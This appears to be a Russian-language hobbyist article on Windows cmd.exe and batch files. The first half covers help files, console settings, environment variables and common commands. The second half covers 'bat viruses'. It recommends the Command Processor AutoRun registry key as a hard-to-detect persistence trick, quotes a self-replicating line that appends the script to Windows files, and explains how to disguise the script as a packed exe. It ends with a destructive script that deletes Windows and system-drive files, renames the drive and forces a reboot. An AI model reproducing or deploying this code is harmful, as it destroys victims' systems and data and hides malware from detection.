В интернете полно статей на подобную тему, но интерес к командной строке всё ещё не пропал. То и дело в сети появляются справочники, руководства, и конечно же примеры bat вирусов. И во многих случаях описываются лишь стандартные команды. Введите help в батнике и вы получите их небольшой список. Каждую новую для себя команду (хотя не такие уж они и новые) встречают с большим воодушевлением. Ведь для создания batников не требуется никаких компиляторов, всё что нужно это винда и прямые руки... Самый полный справочник с описанием cmd.exe находится тут - папка Windows/Help/ntcmds.chm . Обычный файл справки, просматриваемый стандартным средством операционки hh.exe. Также для вывода справки можно использовать меню Выполнить - hh ntcmds.chm . Для тех кто не в курсе любую программу из папки Windows можно запустить из этого меню не указывая пути и расширения файла. Например, когда мы набираем "cmd" в системной папке ищется файл "cmd.exe" , находится в папке system32 и выполняется. Там находится полный список команд, включая и устаревшие (работающие только в Ms Dos), полезные сведения и советы по настройке. Все команды расположены в алфавитном порядке, и в одну статью вряд ли поместятся. Так что смотрите у себя на компе. Настройка Запускаем командную строку, видим её значок в левом верхнем углу окна, правый клик мыши по нему и в открывшемся меню выбираем Свойства. Здесь мы можем настраивать cmd как угодно. На вкладке Общие можно поменять размер курсора, размер буфера, режим отображения и разрешить или запретить выделение мышью. Полезная кстати вещь:) Далее идёт вкладка настройки шрифта, размеров окна и цвета. Если вам когда нибудь надоедали белые буквы на тёмном фоне, то их запросто можно поменять например на зелёные. Теперь о реестре - куда ж без него?
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Command Processor]: Никаких новых параметров нет за исключением одного - AutoRun. Любая программа указанная там будет выполнятся каждый раз при запуске командной строки. Я никогда раньше не встречал такого способа автозапуска, возможно кому нибудь это пригодится. Шансы того что вашу прогу запалят практически нулевые. [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Session Manager/Environment]: Здесь параметры некоторых переменных.
Список стандартных переменных: %os% Имя системы %windir% Путь к папке Windows %systemdrive% Путь к системному диску %programfiles% Путь к Program Files %temp% Путь к временной папке %tmp% То же что и %temp% %allusersprofile% Путь к папке All users %appdata% Путь к папке Application Data для текущего пользователя %userprofile% Путь к папке с документами и настройками текущего пользователя %path% Показывает стандартные системные пути. Многие проги любят менять значение этой переменной, добавляя туда путь своей рабочей папки %pathext% Показывает стандартные расширения %comspec% Путь к самому интерпретатору командной строки cmd.exe %number_of_processors% Выводит количество прцессоров установленных в системе %processor_architecture% Выводит что то наподобие x86 %processor_identifier% Технические характеристики процессора
Всё это можно вывести на экран. Например "echo %windir%".
Теперь список некоторых полезных команд:
Assoc - Выводит список всех расширений и программ с ними сопоставленных. "Assoc .exe = .gif" заставит систему считать все программы файлами изображений Date [нужная дата} - Меняет системную дату Driverquery - Выводит список всех установленных драйверов Ftype .расширение = команда - Установка программы или команды, которая будет выполнятся при Getmac - Выводит mac адрес компьютера Hostname - Выводит имя узла Ipconfig - Параметры протокола и сетевых адаптеров Nbtstat - Вывод статистики протокола Netbios Net - Содержит много параметров для работы с сетью Netstat - Выводит на экран все активные в данный момент подключения Nslookup адрес узла - Вывод доменного имени заданного узла Reg подкоманды - Работа с реестром Tasklist - Вывести список всех процессов Taskkill - Убить процесс по Pid или имени
Насчёт вирусов. Bat вирусы настолько мало распространены, что их список состоит из всего нескольких десятков и подхватить где нибудь эдакую "заразу" весьма проблематично. Но некоторые антивирусные компании всё же добавили сигнатуры в свои базы, видимо с желанием подзаработать. Вот например строчка "for %a in (%windir%*.*) do echo %0 >> %a" палится как вирус... Как же запаковать bat файлы? Можно создать sfx архив с помощью WinRara, поставив вашу прогу на автозапуск после распаковки и отключив визуальное окно потверждения и выбора пути для распаковки. Есть даже специальные проги для этого, например Quick Batch File Compiler. В итоге получаем обычный exeшник. Ставим для него иконку получше, сжимаем упаковщиком и наш вирь готов.
Для примера (и только для примера!) могу привести пример такого заподла, сочиненного на скорую руку:
Код: " @echo off - запрещаем вывод команд на экран, в том числе и результатов их выполнения. color 40 - делаем фон файла красным, а буквы чёрными. label LAMER - команда label указанная без параметров переименовывает системный диск на заданное слово. attrib -s -r -h -a %systemdrive%*.* - снимаем системные атрибуты с некоторых файлов. erase %windir%*.* /q - банальное удаление файлов. erase %windir%system32*.* /q - банальное удаление файлов, хотя винду снесёт без проблем. erase %systemdrive%*.* /q - удаление системно важных скрытых файлов на системном диске. Хотя чтобы винда больше не запустилась никаким образом достаточно удалить файл ntldr и перегрузиться. regedit (путь к вашему файлу) - Добавляем информацию с вашего .reg файла в реестр. Существует ещё и команда reg с параметрами, но иногда проще создать отдельный .reg файл. Здесь фантазии может быть много... echo текст >(>>) файл - Добавляем записи в файл. Знак > создаёт новый файл с заданным текстом, >> добавляет уже в существующий файл. shutdown -r -f - Принудительно перезагружаем комп, несмотря на протесты системы. "
Это были лишь заготовки, а насколько серьёзно вы будете модифицировать реестр или изменять файлы зависит от вас. На этом статья подходит к концу, так как тема bat файлов исчерпана полностью. Больше чем команд в стандартном описании найти невозможно. Считайте файл ntcmds.chm дополнением к статье. Спасибо за внимание
